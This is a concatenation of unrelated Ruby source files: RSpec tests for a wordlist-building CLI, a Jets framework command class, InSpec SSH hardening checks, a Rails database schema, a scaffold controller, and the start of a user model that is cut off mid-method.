%w[-t --tr].each do |flag|
context "when given #{flag} CHARS:REPLACE" do
let(:chars) { 'e' }
let(:replace) { '3' }
let(:argv) { [flag, "#{chars}:#{replace}"] }
before { subject.option_parser.parse(argv) }
it "must append to #modifiers" do
expect(subject.modifiers.length).to be(1)
expect(subject.modifiers[0][0]).to be(:tr)
expect(subject.modifiers[0][1].length).to be(2)
expect(subject.modifiers[0][1][0]).to eq(chars)
expect(subject.modifiers[0][1][1]).to eq(replace)
end
end
end
%w[-s --sub].each do |flag|
context "when given #{flag} CHARS:REPLACE" do
let(:chars) { 'e' }
let(:replace) { '3' }
let(:argv) { [flag, "#{chars}:#{replace}"] }
before { subject.option_parser.parse(argv) }
it "must append to #modifiers" do
expect(subject.modifiers.length).to be(1)
expect(subject.modifiers[0][0]).to be(:sub)
expect(subject.modifiers[0][1].length).to be(2)
expect(subject.modifiers[0][1][0]).to eq(chars)
expect(subject.modifiers[0][1][1]).to eq(replace)
end
end
end
%w[-g --gsub].each do |flag|
context "when given #{flag} CHARS:REPLACE" do
let(:chars) { 'e' }
let(:replace) { '3' }
let(:argv) { [flag, "#{chars}:#{replace}"] }
before { subject.option_parser.parse(argv) }
it "must append to #modifiers" do
expect(subject.modifiers.length).to be(1)
expect(subject.modifiers[0][0]).to be(:gsub)
expect(subject.modifiers[0][1].length).to be(2)
expect(subject.modifiers[0][1][0]).to eq(chars)
expect(subject.modifiers[0][1][1]).to eq(replace)
end
end
end
%w[-m --mutate].each do |flag|
context "when given #{flag} CHARS:REPLACE" do
let(:chars) { 'e' }
let(:replace) { '3' }
let(:argv) { [flag, "#{chars}:#{replace}"] }
before { subject.option_parser.parse(argv) }
it "must append to #modifiers" do
expect(subject.modifiers.length).to be(1)
expect(subject.modifiers[0][0]).to be(:mutate)
expect(subject.modifiers[0][1].length).to be(2)
expect(subject.modifiers[0][1][0]).to eq(chars)
expect(subject.modifiers[0][1][1]).to eq(replace)
end
end
end
%w[-M --mutate-case].each do |flag|
context "when given #{flag}" do
let(:argv) { [flag] }
before { subject.option_parser.parse(argv) }
it "must append to #modifiers" do
expect(subject.modifiers.length).to be(1)
expect(subject.modifiers[0][0]).to be(:mutate_case)
expect(subject.modifiers[0][1].length).to be(0)
end
end
end
%w[-b --build].each do |flag|
context "when given #{flag} WORDLIST" do
let(:wordlist) { File.join(fixtures_dir,'new_wordlist.txt') }
let(:argv) { [flag, wordlist] }
before { subject.option_parser.parse(argv) }
it "must append to #modifiers" do
expect(subject.mode).to eq(:build)
expect(subject.output).to eq(wordlist)
end
end
end
%w[-a --append].each do |flag|
context "when given #{flag}" do
let(:argv) { [flag] }
before { subject.option_parser.parse(argv) }
it "must set #builder_options[:append] to true" do
expect(subject.builder_options[:append]).to be(true)
end
context "and when given --no-append" do
let(:argv) { ['--append', '--no-append'] }
it "must set #builder_options[:append] to false" do
expect(subject.builder_options[:append]).to be(false)
end
end
end
end
%w[-L --lang].each do |flag|
context "when given #{flag} LANG" do
let(:lang) { 'fr' }
let(:argv) { [flag, lang] }
before { subject.option_parser.parse(argv) }
it "must set #builder_options[:lang] to LANG" do
expect(subject.builder_options[:lang]).to eq(lang)
end
end
end
context "when given --stop-words \"WORDS...\"" do
let(:words) { "foo bar baz" }
let(:argv) { ['--stop-words', words] }
before { subject.option_parser.parse(argv) }
it "must set #builder_options[:stop_words] to the Array of WORDS" do
expect(subject.builder_options[:stop_words]).to eq(words.split)
end
end
context "when given --ignore-words \"WORDS...\"" do
let(:words) { "foo bar baz" }
let(:argv) { ['--ignore-words', words] }
before { subject.option_parser.parse(argv) }
it "must set #builder_options[:ignore_words] to the Array of WORDS" do
expect(subject.builder_options[:ignore_words]).to eq(words.split)
end
end
context "when given --digits" do
let(:argv) { ['--digits'] }
before { subject.option_parser.parse(argv) }
it "must set #builder_options[:digits] to true" do
expect(subject.builder_options[:digits]).to be(true)
end
context "and when given --no-digits" do
let(:argv) { ['--digits', '--no-digits'] }
it "must set #builder_options[:digits] to false" do
expect(subject.builder_options[:digits]).to be(false)
end
end
end
context "when given --special-chars \"CHARS...\"" do
let(:chars) { "!@#$%^&*()_-" }
let(:argv) { ['--special-chars', chars] }
before { subject.option_parser.parse(argv) }
it "must set #builder_options[:special_chars] to the Array of CHARS" do
expect(subject.builder_options[:special_chars]).to eq(chars.chars)
end
end
context "when given --numbers" do
let(:argv) { ['--numbers'] }
before { subject.option_parser.parse(argv) }
it "must set #builder_options[:numbers] to true" do
expect(subject.builder_options[:numbers]).to be(true)
end
context "and when given --no-numbers" do
let(:argv) { ['--numbers', '--no-numbers'] }
it "must set #builder_options[:numbers] to false" do
expect(subject.builder_options[:numbers]).to be(false)
end
end
end
context "when given --acronyms" do
let(:argv) { ['--acronyms'] }
before { subject.option_parser.parse(argv) }
it "must set #builder_options[:acronyms] to true" do
expect(subject.builder_options[:acronyms]).to be(true)
end
context "and when given --no-acronyms" do
let(:argv) { ['--acronyms', '--no-acronyms'] }
it "must set #builder_options[:acronyms] to false" do
expect(subject.builder_options[:acronyms]).to be(false)
end
end
end
context "when given --normalize-case" do
let(:argv) { ['--normalize-case'] }
before { subject.option_parser.parse(argv) }
it "must set #builder_options[:normalize_case] to true" do
expect(subject.builder_options[:normalize_case]).to be(true)
end
context "and when given --no-normalize-case" do
let(:argv) { ['--normalize-case', '--no-normalize-case'] }
it "must set #builder_options[:normalize_case] to false" do
expect(subject.builder_options[:normalize_case]).to be(false)
end
end
end
context "when given --normalize-apostrophes" do
let(:argv) { ['--normalize-apostrophes'] }
before { subject.option_parser.parse(argv) }
it "must set #builder_options[:normalize_apostrophes] to true" do
expect(subject.builder_options[:normalize_apostrophes]).to be(true)
end
context "and when given --no-normalize-apostrophes" do
let(:argv) { ['--normalize-apostrophes', '--no-normalize-apostrophes'] }
it "must set #builder_options[:normalize_apostrophes] to false" do
expect(subject.builder_options[:normalize_apostrophes]).to be(false)
end
end
end
context "when given --normalize-acronyms" do
let(:argv) { ['--normalize-acronyms'] }
before { subject.option_parser.parse(argv) }
it "must set #builder_options[:normalize_acronyms] to true" do
expect(subject.builder_options[:normalize_acronyms]).to be(true)
end
context "and when given --no-normalize-acronyms" do
let(:argv) { ['--normalize-acronyms', '--no-normalize-acronyms'] }
it "must set #builder_options[:normalize_acronyms] to false" do
expect(subject.builder_options[:normalize_acronyms]).to be(false)
end
end
end
%w[-V --version].each do |flag|
context "when given #{flag}" do
let(:argv) { [flag] }
it "must append to #modifiers" do
expect(subject).to receive(:exit)
expect {
subject.option_parser.parse(argv)
}.to output("#{described_class::PROGRAM_NAME} #{Wordlist::VERSION}#{$/}").to_stdout
end
end
end
%w[-h --help].each do |flag|
context "when given #{flag}" do
let(:argv) { [flag] }
it "must append to #modifiers" do
expect(subject).to receive(:exit)
expect {
subject.option_parser.parse(argv)
}.to output("#{subject.option_parser}").to_stdout
end
end
end
end
end
describe ".run" do
subject { described_class }
context "when Interrupt is raised" do
before do
expect_any_instance_of(described_class).to receive(:run).and_raise(Interrupt)
end
it "must exit with 130" do
expect(subject.run([])).to eq(130)
end
end
context "when Errno::EPIPE is raised" do
before do
expect_any_instance_of(described_class).to receive(:run).and_raise(Errno::EPIPE)
end
it "must exit with 0" do
expect(subject.run([])).to eq(0)
end
end
end
describe "#run" do
context "when given a wordlist file" do
let(:file) { ::File.join(fixtures_dir,'wordlist.txt') }
let(:argv) { [file] }
let(:expected_words) { File.readlines(file).map(&:chomp) }
it "must read each word from the file and print it to stdout" do
expect {
subject.run(argv)
}.to output(
expected_words.join($/) + $/
).to_stdout
end
context "when also given the --exec COMMAND option" do
let(:command) { 'echo "WORD: {}"' }
let(:argv) { ["--exec", command, file] }
let(:expected_output) do
expected_words.map do |word|
end
end
it "must execute the command with each word from the wordlist" do
expected_words.each do |word|
expect(subject).to receive(:system).with(command.sub('{}',word))
end
subject.run(argv)
end
end
end
context "when given the --build option" do
let(:expected_words) { %w[foo bar baz qux] }
let(:text) { (expected_words * 100).shuffle.join(' ') }
let(:output) { File.join(fixtures_dir,'new_wordlist.txt') }
context "and given one input file" do
let(:input) { File.join(fixtures_dir,"input_file.txt") }
let(:argv) { ["--build", output, input] }
before { File.write(input,text) }
it "must build a new wordlist file based on the given file" do
subject.run(argv)
expect(File.readlines(output).map(&:chomp)).to match_array(expected_words)
end
after { FileUtils.rm_f(input) }
end
context "and given multiple input files" do
let(:words) { (expected_words * 100).shuffle }
let(:text1) { words[0,50] }
let(:text2) { words[50,50] }
let(:input1) { File.join(fixtures_dir,"input_file1.txt") }
let(:input2) { File.join(fixtures_dir,"input_file2.txt") }
let(:argv) { ["--build", output, input1, input2] }
before do
File.write(input1,text1)
File.write(input2,text2)
end
it "must build a new wordlist file based on the given files" do
subject.run(argv)
expect(File.readlines(output).map(&:chomp)).to match_array(expected_words)
end
after do
FileUtils.rm_f(input1)
FileUtils.rm_f(input2)
end
end
context "and given no input files" do
let(:argv) { ["--build", output] }
before do
$stdin = StringIO.new(text)
end
it "must build a new wordlist file by reading stdin" do
subject.run(argv)
expect(File.readlines(output).map(&:chomp)).to match_array(expected_words)
end
after do
$stdin = STDIN
end
end
after { FileUtils.rm_f(output) }
end
context "when an invalid option is given" do
let(:opt) { '--foo' }
it "must print 'wordlist: invalid option ...' to $stderr and exit with -1" do
expect {
expect(subject.run([opt])).to eq(-1)
}.to output("wordlist: invalid option: #{opt}#{$/}").to_stderr
end
end
context "when another type of Exception is raised" do
let(:exception) { RuntimeError.new("error!") }
before do
expect(subject).to receive(:read_mode).and_raise(exception)
end
it "must print a backtrace and exit with -1" do
expect {
expect(subject.run([])).to eq(-1)
}.to output(
%r{Oops! Looks like you've found a bug!
Please report the following text to: #{Regexp.escape(described_class::BUG_REPORT_URL)}
```}m
).to_stderr
end
end
end
end
| 30.782067 | 126 | 0.571001 |
21e81013d086b324fe324833cdc29a8d35cb8c66 | 5,224 | require "thor"
module Jets::Commands
class Main < Base
class_option :noop, type: :boolean
desc "build", "Builds and packages project for AWS Lambda"
long_desc Help.text(:build)
option :templates, type: :boolean, default: false, desc: "Only build the CloudFormation templates. Skip code building"
def build
Build.new(options).run
end
desc "deploy [environment]", "Builds and deploys project to AWS Lambda"
long_desc Help.text(:deploy)
# Note the environment is here to trick the Thor parser to allowing an
# environment parameter. It is not actually set here. It is set earlier
# in cli.rb: set_jets_env_for_deploy_command!
def deploy(environment=nil)
Deploy.new(options).run
end
desc "delete", "Delete the Jets project and all its resources"
long_desc Help.text(:delete)
option :sure, type: :boolean, desc: "Skip are you sure prompt."
option :wait, type: :boolean, default: true, desc: "Wait for stack deletion to complete."
def delete
Delete.new(options).run
end
desc "server", "Runs a local server that mimics API Gateway for development"
long_desc Help.text(:server)
option :port, default: "8888", desc: "use PORT"
option :host, default: "127.0.0.1", desc: "listen on HOST"
option :reload, type: :boolean, default: true, desc: "Enables hot-reloading for development"
def server
# shell out to shotgun for automatic reloading
o = options
server_command = o[:reload] ? "shotgun" : "rackup"
command = "bundle exec #{server_command} --port #{o[:port]} --host #{o[:host]}"
puts "=> #{command}".colorize(:green)
puts Jets::Booter.message
Jets::Booter.check_config_ru!
Jets::Server.start(options) unless ENV['JETS_RACK'] == '0' # rack server runs in background by default
system(command)
end
desc "routes", "Print out your application routes"
long_desc Help.text(:routes)
def routes
puts Jets::Router.routes_help
end
desc "console", "REPL console with Jets environment loaded"
long_desc Help.text(:console)
def console
Console.run
end
desc "runner", "Run Ruby code in the context of Jets app non-interactively"
long_desc Help.text(:runner)
def runner(code)
Runner.run(code)
end
desc "dbconsole", "Starts DB REPL console"
long_desc Help.text(:dbconsole)
def dbconsole
Dbconsole.start(*args)
end
# Command is called 'call' because invoke is a Thor keyword.
desc "call [function] [event]", "Call a lambda function on AWS or locally"
long_desc Help.text(:call)
option :invocation_type, default: "RequestResponse", desc: "RequestResponse, Event, or DryRun"
option :log_type, default: "Tail", desc: "Works if invocation_type set to RequestResponse"
option :qualifier, desc: "Lambda function version or alias name"
option :show_log, type: :boolean, desc: "Shows last 4KB of log in the x-amz-log-result header"
option :lambda_proxy, type: :boolean, default: true, desc: "Enables automatic Lambda proxy transformation of the event payload"
option :guess, type: :boolean, default: true, desc: "Enables guess mode. Uses inference to allows use of all dashes to specify functions. Smart mode verifies that the function exists in the code base."
option :local, type: :boolean, desc: "Enables local mode. Instead of invoke the AWS Lambda function, the method gets called locally with current app code. With local mode guess mode is always used."
def call(function_name, payload='')
# Printing to stdout can mangle up the response when piping
# the value to jq. For example:
#
# `jets call --local .. | jq`
#
# By redirecting stderr we can use jq safely.
#
$stdout.sync = true
$stderr.sync = true
$stdout = $stderr # jets call operation
Call.new(function_name, payload, options).run
end
desc "generate [type] [args]", "Generates things like scaffolds"
long_desc Help.text(:generate)
def generate(generator, *args)
Jets::Generator.invoke(generator, *args)
end
desc "status", "Shows the current status of the Jets app"
long_desc Help.text(:status)
def status
Jets::Cfn::Status.new(options).run
end
desc "url", "App url if routes are defined"
long_desc Help.text(:url)
def url
Jets::Commands::Url.new(options).display
end
desc "secret", "Generates secret"
long_desc Help.text(:secret)
def secret
puts SecureRandom.hex(64)
end
desc "middleware", "Prints list of middleware"
long_desc Help.text(:middleware)
def middleware
stack = Jets.application.middlewares
stack.middlewares.each do |middleware|
puts "use #{middleware.name}"
end
puts "run #{Jets.application.endpoint}"
end
desc "version", "Prints Jets version"
long_desc Help.text(:version)
def version
puts Jets.version
end
long_desc Help.text(:new)
Jets::Commands::New.cli_options.each do |args|
option(*args)
end
register(Jets::Commands::New, "new", "new", "Creates a starter skeleton jets project")
end
end
| 36.277778 | 205 | 0.67611 |
26c464177c7267189574be3a2fa76350fdc4b948 | 298 | require './config/environment'
if ActiveRecord::Base.connection.migration_context.needs_migration?
raise 'Migrations are pending. Run `rake db:migrate` to resolve the issue.'
end
use Rack::MethodOverride
use SessionsController
use TweetsController
use UsersController
run ApplicationController
| 24.833333 | 77 | 0.832215 |
918adafe80eb0480cb60c928a46894a0c7126db4 | 674 | require 'spec_helper'
describe ROM::Adapter do
subject(:adapter) { rom.postgres.adapter }
let(:setup) { ROM.setup(postgres: "postgres://localhost/rom") }
let(:rom) { setup.finalize }
describe '#dataset?' do
it 'returns true if a table exists' do
expect(adapter.dataset?(:users)).to be(true)
end
it 'returns false if a table does not exist' do
expect(adapter.dataset?(:not_here)).to be(false)
end
end
describe '#disconnect' do
it 'disconnects via sequel connection' do
# FIXME: no idea how to test it in a different way
expect(adapter.connection).to receive(:disconnect)
adapter.disconnect
end
end
end
| 24.962963 | 65 | 0.672107 |
f7de4b5a88c1573229f07217d1512e62e04ba1f6 | 3,188 | require 'spec_helper'
RSpec.describe Togls::FeatureToggleRegistryManager do
let(:klass) { Class.new { include Togls::FeatureToggleRegistryManager } }
describe ".release" do
context "when features have NOT been defined" do
it "creates a new empty release toggle registry" do
expect(Togls::ToggleRegistry).to receive(:new)
klass.release
end
end
context "when given a block" do
it "expands the feature registry with a new block" do
registry = klass.release
b = Proc.new {}
expect(registry).to receive(:expand).and_yield(&b)
klass.release(&b)
end
end
it "returns the release toggle registry" do
release_toggle_registry = double('release toggle registry')
allow(Togls::ToggleRegistry).to receive(:new).and_return(release_toggle_registry)
expect(klass.release).to eq(release_toggle_registry)
end
end
describe '.feature' do
context "when features have NOT been defined" do
it "creates a new empty release toggle registry" do
klass.instance_variable_set(:@release_toggle_registry, nil)
expect(Togls::ToggleRegistry).to receive(:new).and_call_original
klass.feature("key")
end
end
it "returns the release toggle identified by the key" do
feature_registry = instance_double Togls::ToggleRegistry
klass.instance_variable_set(:@release_toggle_registry, feature_registry)
expect(feature_registry).to receive(:get).with("key")
klass.feature("key")
end
end
describe '.enable_test_mode' do
it 'stores the current release toggle registry' do
test_registry = double('test registry')
klass.instance_variable_set(:@release_toggle_registry, test_registry)
klass.enable_test_mode
expect(klass.instance_variable_get(:@previous_release_toggle_registry)).to\
eq(test_registry)
end
it 'sets the release toggle registry to the test toggle registry' do
test_registry = double('test registry')
allow(klass).to receive(:test_toggle_registry).and_return(test_registry)
klass.enable_test_mode
expect(klass.instance_variable_get(:@release_toggle_registry)).to eq(test_registry)
end
end
describe '.disable_test_mode' do
it 'restores the release toggle registry to prev stored value' do
test_registry = double('test registry')
klass.instance_variable_set(:@previous_release_toggle_registry, test_registry)
klass.disable_test_mode
expect(klass.instance_variable_get(:@release_toggle_registry)).to\
eq(test_registry)
end
end
describe '.test_mode' do
it 'enables test mode' do
allow(klass).to receive(:disable_test_mode)
expect(klass).to receive(:enable_test_mode)
klass.test_mode {}
end
it 'yields the provided block' do
allow(klass).to receive(:enable_test_mode)
allow(klass).to receive(:disable_test_mode)
expect { |b| klass.test_mode(&b) }.to yield_control
end
it 'disables test mode' do
allow(klass).to receive(:enable_test_mode)
expect(klass).to receive(:disable_test_mode)
klass.test_mode {}
end
end
end
| 33.914894 | 89 | 0.705772 |
7a556c6c99b4eea9e85518c22fc04fdeb5023d31 | 2,038 | # encoding: utf-8
#
# Copyright 2017, Joe Gardiner
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
title 'SSH server config'
#only_if do
# command('sshd').exist?
#end
control 'sshd-01' do
impact 1.0
title 'Server: Specify protocol version 2'
desc "Only SSH protocol version 2 connections should be permitted. Version 1 of the protocol contains security vulnerabilities. Don't use legacy insecure SSHv1 connections anymore."
describe sshd_config do
its('Protocol') { should eq('2') }
end
end
control 'sshd-02' do
impact 1.0
title 'Server: Enable StrictModes'
desc 'Prevent the use of insecure home directory and key file permissions.'
describe sshd_config do
its('StrictModes') { should eq('yes') }
end
end
control 'sshd-03' do
impact 1.0
title 'Server: Check for secure ssh ciphers'
desc 'Configure a list of ciphers to the best secure ciphers (avoid older and weaker ciphers)'
describe sshd_config do
its('Ciphers') { should eq(ssh_crypto.valid_ciphers) }
end
end
control 'sshd-04' do
impact 1.0
title 'Server: Specify the listen ssh Port'
desc 'Always specify which port the SSH server should listen to. Prevent unexpected settings.'
describe sshd_config do
its('Port') { should eq('22') }
end
end
control 'sshd-05' do
impact 1.0
title 'Server: Enable PubkeyAuthentication'
desc 'Prefer public key authentication mechanisms, because other methods are weaker (e.g. passwords).'
describe sshd_config do
its('PubkeyAuthentication') { should eq('yes') }
end
end
| 29.970588 | 183 | 0.736506 |
6285f3c0a5e956b8218b303e3b6cb5ff211a1d5f | 12,358 | # This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# This file is the source Rails uses to define your schema when running `bin/rails
# db:schema:load`. When creating a new database, `bin/rails db:schema:load` tends to
# be faster and is potentially less error prone than running all of your
# migrations from scratch. Old migrations may fail to apply correctly if those
# migrations use external dependencies or application code.
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema[7.0].define(version: 2022_02_14_204932) do
# These are extensions that must be enabled in order to support this database
enable_extension "plpgsql"
create_table "active_storage_attachments", force: :cascade do |t|
t.string "name", null: false
t.string "record_type", null: false
t.bigint "record_id", null: false
t.bigint "blob_id", null: false
t.datetime "created_at", precision: 6, null: false
t.index ["blob_id"], name: "index_active_storage_attachments_on_blob_id"
t.index ["record_type", "record_id", "name", "blob_id"], name: "index_active_storage_attachments_uniqueness", unique: true
end
create_table "active_storage_blobs", force: :cascade do |t|
t.string "key", null: false
t.string "filename", null: false
t.string "content_type"
t.text "metadata"
t.string "service_name", null: false
t.bigint "byte_size", null: false
t.string "checksum", null: false
t.datetime "created_at", precision: 6, null: false
t.index ["key"], name: "index_active_storage_blobs_on_key", unique: true
end
create_table "active_storage_variant_records", force: :cascade do |t|
t.bigint "blob_id", null: false
t.string "variation_digest", null: false
t.index ["blob_id", "variation_digest"], name: "index_active_storage_variant_records_uniqueness", unique: true
end
create_table "analytics_events", force: :cascade do |t|
t.string "url", null: false
t.string "goal", null: false
t.integer "value", default: 0, null: false
t.datetime "tracked_at", precision: nil
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "businesses", force: :cascade do |t|
t.bigint "user_id"
t.string "name", null: false
t.string "company", null: false
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
t.text "bio", null: false
t.integer "developer_notifications", default: 0, null: false
t.index ["user_id"], name: "index_businesses_on_user_id"
end
create_table "conversations", force: :cascade do |t|
t.bigint "developer_id"
t.bigint "business_id"
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
t.datetime "developer_blocked_at", precision: 6
t.datetime "business_blocked_at", precision: 6
t.index ["business_id"], name: "index_conversations_on_business_id"
t.index ["developer_id"], name: "index_conversations_on_developer_id"
end
create_table "developers", force: :cascade do |t|
t.string "name", null: false
t.string "email"
t.date "available_on"
t.string "hero", null: false
t.text "bio", null: false
t.string "website"
t.string "github"
t.string "twitter"
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
t.integer "user_id"
t.string "linkedin"
t.integer "search_status"
t.integer "preferred_min_hourly_rate"
t.integer "preferred_max_hourly_rate"
t.integer "preferred_min_salary"
t.integer "preferred_max_salary"
t.string "time_zone"
t.integer "utc_offset"
end
create_table "messages", force: :cascade do |t|
t.bigint "conversation_id"
t.string "sender_type"
t.bigint "sender_id"
t.text "body", null: false
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
t.text "body_html", null: false
t.index ["conversation_id"], name: "index_messages_on_conversation_id"
t.index ["sender_type", "sender_id"], name: "index_messages_on_sender"
end
create_table "notifications", force: :cascade do |t|
t.string "recipient_type", null: false
t.bigint "recipient_id", null: false
t.string "type", null: false
t.jsonb "params"
t.datetime "read_at", precision: 6
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
t.index ["read_at"], name: "index_notifications_on_read_at"
t.index ["recipient_type", "recipient_id"], name: "index_notifications_on_recipient"
end
create_table "open_startup_contributions", force: :cascade do |t|
t.date "occurred_on", null: false
t.string "description", null: false
t.string "url"
t.decimal "amount", null: false
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
end
create_table "open_startup_expenses", force: :cascade do |t|
t.date "occurred_on", null: false
t.string "description", null: false
t.string "url"
t.decimal "amount", null: false
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
end
create_table "open_startup_metrics", force: :cascade do |t|
t.date "occurred_on", null: false
t.jsonb "data", default: {}, null: false
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
end
create_table "open_startup_monthly_balances", force: :cascade do |t|
t.date "occurred_on", null: false
t.decimal "revenue", null: false
t.decimal "expenses", null: false
t.decimal "contributions", null: false
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
end
create_table "open_startup_revenue", force: :cascade do |t|
t.date "occurred_on", null: false
t.string "description", null: false
t.decimal "amount", null: false
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
end
create_table "open_startup_stripe_transactions", force: :cascade do |t|
t.string "stripe_id", null: false
t.decimal "amount", null: false
t.datetime "created", precision: 6, null: false
t.string "description", null: false
t.decimal "fee", null: false
t.string "transaction_type", null: false
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
t.index ["stripe_id"], name: "index_open_startup_stripe_transactions_on_stripe_id"
t.index ["transaction_type"], name: "index_open_startup_stripe_transactions_on_transaction_type"
end
create_table "open_startup_transactions", force: :cascade do |t|
t.date "occurred_on", null: false
t.string "description", null: false
t.string "url"
t.decimal "amount", null: false
t.integer "transaction_type", default: 1, null: false
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
end
create_table "pay_charges", force: :cascade do |t|
t.bigint "customer_id", null: false
t.bigint "subscription_id"
t.string "processor_id", null: false
t.integer "amount", null: false
t.string "currency"
t.integer "application_fee_amount"
t.integer "amount_refunded"
t.jsonb "metadata"
t.jsonb "data"
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
t.index ["customer_id", "processor_id"], name: "index_pay_charges_on_customer_id_and_processor_id", unique: true
t.index ["subscription_id"], name: "index_pay_charges_on_subscription_id"
end
create_table "pay_customers", force: :cascade do |t|
t.string "owner_type"
t.bigint "owner_id"
t.string "processor", null: false
t.string "processor_id"
t.boolean "default"
t.jsonb "data"
t.datetime "deleted_at", precision: 6
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
t.index ["owner_type", "owner_id", "deleted_at", "default"], name: "pay_customer_owner_index"
t.index ["processor", "processor_id"], name: "index_pay_customers_on_processor_and_processor_id", unique: true
end
create_table "pay_merchants", force: :cascade do |t|
t.string "owner_type"
t.bigint "owner_id"
t.string "processor", null: false
t.string "processor_id"
t.boolean "default"
t.jsonb "data"
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
t.index ["owner_type", "owner_id", "processor"], name: "index_pay_merchants_on_owner_type_and_owner_id_and_processor"
end
create_table "pay_payment_methods", force: :cascade do |t|
t.bigint "customer_id", null: false
t.string "processor_id", null: false
t.boolean "default"
t.string "type"
t.jsonb "data"
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
t.index ["customer_id", "processor_id"], name: "index_pay_payment_methods_on_customer_id_and_processor_id", unique: true
end
create_table "pay_subscriptions", force: :cascade do |t|
t.bigint "customer_id", null: false
t.string "name", null: false
t.string "processor_id", null: false
t.string "processor_plan", null: false
t.integer "quantity", default: 1, null: false
t.string "status", null: false
t.datetime "trial_ends_at", precision: 6
t.datetime "ends_at", precision: 6
t.decimal "application_fee_percent", precision: 8, scale: 2
t.jsonb "metadata"
t.jsonb "data"
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
t.index ["customer_id", "processor_id"], name: "index_pay_subscriptions_on_customer_id_and_processor_id", unique: true
end
create_table "pay_webhooks", force: :cascade do |t|
t.string "processor"
t.string "event_type"
t.jsonb "event"
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
end
create_table "role_types", force: :cascade do |t|
t.bigint "developer_id"
t.boolean "part_time_contract"
t.boolean "full_time_contract"
t.boolean "full_time_employment"
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
t.index ["developer_id"], name: "index_role_types_on_developer_id", unique: true
end
create_table "users", force: :cascade do |t|
t.string "email", default: "", null: false
t.string "encrypted_password", default: "", null: false
t.string "reset_password_token"
t.datetime "reset_password_sent_at", precision: 6
t.datetime "remember_created_at", precision: 6
t.string "confirmation_token"
t.datetime "confirmed_at", precision: 6
t.datetime "confirmation_sent_at", precision: 6
t.string "unconfirmed_email"
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
t.boolean "admin", default: false, null: false
t.index ["confirmation_token"], name: "index_users_on_confirmation_token", unique: true
t.index ["email"], name: "index_users_on_email", unique: true
t.index ["reset_password_token"], name: "index_users_on_reset_password_token", unique: true
end
add_foreign_key "active_storage_attachments", "active_storage_blobs", column: "blob_id"
add_foreign_key "active_storage_variant_records", "active_storage_blobs", column: "blob_id"
add_foreign_key "pay_charges", "pay_customers", column: "customer_id"
add_foreign_key "pay_charges", "pay_subscriptions", column: "subscription_id"
add_foreign_key "pay_payment_methods", "pay_customers", column: "customer_id"
add_foreign_key "pay_subscriptions", "pay_customers", column: "customer_id"
add_foreign_key "role_types", "developers"
end
| 41.056478 | 126 | 0.709905 |
e88583c1dc22ce3787dbb5a7ac6186ccef58ef1c | 1,782 | class CantsController < ApplicationController
before_action :set_cant, only: [:show, :edit, :update, :destroy]
# GET /cants
# GET /cants.json
def index
@cants = Cant.all
end
# GET /cants/1
# GET /cants/1.json
def show
end
# GET /cants/new
def new
@cant = Cant.new
end
# GET /cants/1/edit
def edit
end
# POST /cants
# POST /cants.json
def create
@cant = Cant.new(cant_params)
respond_to do |format|
if @cant.save
format.html { redirect_to @cant, notice: 'Cant was successfully created.' }
format.json { render :show, status: :created, location: @cant }
else
format.html { render :new }
format.json { render json: @cant.errors, status: :unprocessable_entity }
end
end
end
# PATCH/PUT /cants/1
# PATCH/PUT /cants/1.json
def update
respond_to do |format|
if @cant.update(cant_params)
format.html { redirect_to @cant, notice: 'Cant was successfully updated.' }
format.json { render :show, status: :ok, location: @cant }
else
format.html { render :edit }
format.json { render json: @cant.errors, status: :unprocessable_entity }
end
end
end
# DELETE /cants/1
# DELETE /cants/1.json
def destroy
@cant.destroy
respond_to do |format|
format.html { redirect_to cants_url, notice: 'Cant was successfully destroyed.' }
format.json { head :no_content }
end
end
private
# Use callbacks to share common setup or constraints between actions.
def set_cant
@cant = Cant.find(params[:id])
end
# Never trust parameters from the scary internet, only allow the white list through.
def cant_params
params.require(:cant).permit(:name, :prov_id)
end
end
| 23.76 | 88 | 0.637486 |
abdea4fc53c3d786ebce9b9583158a9a0d9ea9fd | 5,499 | class User < ApplicationRecord
# Include default devise modules. Others available are:
# :lockable
# :rememberable
devise :database_authenticatable,
:trackable,
:timeoutable
devise :omniauthable, omniauth_providers: Rails.configuration.x.omniauth.providers
belongs_to :organization, optional: true
has_many :user_roles, dependent: :destroy
has_many :forms, through: :user_roles, primary_key: "form_id"
has_many :collections, through: :organization
validate :api_key_format
before_save :update_api_key_updated_at
def update_api_key_updated_at
if self.api_key_changed?
self.api_key_updated_at = Time.now
end
end
def api_key_format
if self.api_key.present? && self.api_key.length != 40
